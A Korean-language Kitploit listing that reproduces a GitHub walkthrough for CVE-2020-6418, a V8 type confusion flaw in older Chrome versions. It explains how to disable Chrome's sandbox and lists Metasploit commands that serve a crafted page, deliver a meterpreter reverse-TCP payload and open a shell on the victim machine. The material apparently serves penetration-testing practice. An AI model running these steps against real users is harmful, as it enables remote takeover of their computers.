Skip to content
KitploitKITPLOIT
도구블로그
Log in
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2020-6418 — V8의 유형 혼동을 이용한 CVE-2020-6418용 익스플로잇으로, 조작된 HTML 페이지를 통해 원격 코드 실행을 가능하게 합니다. Metasploit을 사용하여 리버스 셸 페이로드를 전달합니다. | Kitploit
도구/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Exploit FrameworksPayload GenerationExploitationWeb Application ExploitationPenetration Testing
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

V8의 유형 혼동을 이용한 CVE-2020-6418용 익스플로잇으로, 조작된 HTML 페이지를 통해 원격 코드 실행을 가능하게 합니다. Metasploit을 사용하여 리버스 셸 페이로드를 전달합니다.

저장소 보기
1204년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2020-6418

CVE 2020-6418은 Google Chrome의 V8 엔진에서 발생하는 타입 혼동(Type Confusion) 취약점입니다. 영향을 받는 버전은 80.0.3987.122 이전 버전입니다. 이 취약점은 원격 공격자가 조작된 HTML 페이지를 통해 대상 장치의 셸에 접근함으로써 악용될 수 있습니다.

환경 요구 사항

  1. 80.0.3987.122 이전 버전의 Google Chrome
참고: 익스플로잇이 성공하려면 Google Chrome 브라우저를 샌드박스 없이 실행해야 합니다.
  1. Metasploit Framework
  2. OS : 모든 운영체제

익스플로잇 설정

  1. Google Chrome 버전 v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

샌드박스 없이 Google Chrome 설정하기

i) Google Chrome 바로가기를 생성합니다
ii) 속성(Properties)을 클릭한 후 "Target" 옵션으로 이동합니다
iii) EXE 경로 끝에 공백을 추가하고 -no--sandbox를 입력합니다
iv) 적용(Apply) > 확인(Ok)을 클릭합니다
v) 새 Google Chrome 브라우저를 열면 아래와 같은 팝업이 표시됩니다.

지원되지 않는 명령줄 플래그를 사용하고 있습니다: -no-sandbox. 안정성과 보안이 저하됩니다.

샌드박스 비활성화 데모

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Metasploit 사용하기

익스플로잇을 수행하기 위해 Kali를 환경으로 사용하고 있으므로 Metasploit은 해당 배포판에 기본 내장된 도구로 제공됩니다. 하지만 다른 배포판을 사용하는 경우 익스플로잇을 시작하기 전에 Metasploit을 설정해야 합니다.

자세한 내용은 Metasploit 설치를 참조하세요.

익스플로잇 수행

i) Metasploit 프레임워크 시작

> msfconsole

ii) 익스플로잇 검색

> search chrome_js

iii) 위 출력에서 사용 가능한 익스플로잇 사용

> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) SRVHOST IP 주소 입력

> set SRVHOST <ip address>

v) 타겟(Target) 지정 여기서 두 가지 옵션이 제공됩니다.

  1. Target 0 : Windows용
  2. Target 1 : MAC용
> set Target " Number "

vi) 페이로드(Payload) 설정

> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) 현재 설정 및 활성화된 옵션을 확인합니다.

> show options

viii) 익스플로잇 실행

> run (or) > exploit

ix) URL이 제공되며, 세션을 활성화하려면 이 URL을 브라우저에 복사해야 합니다.

x) 사용자가 URL에 접근하면 세션이 생성됩니다. 이를 확인하려면

> show sessions

xi) 세션을 사용하여 사용자 시스템 정보를 확인하거나 셸에 진입할 수 있습니다.

> sessions <number>
> shell

익스플로잇 데모

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

도구 다운로드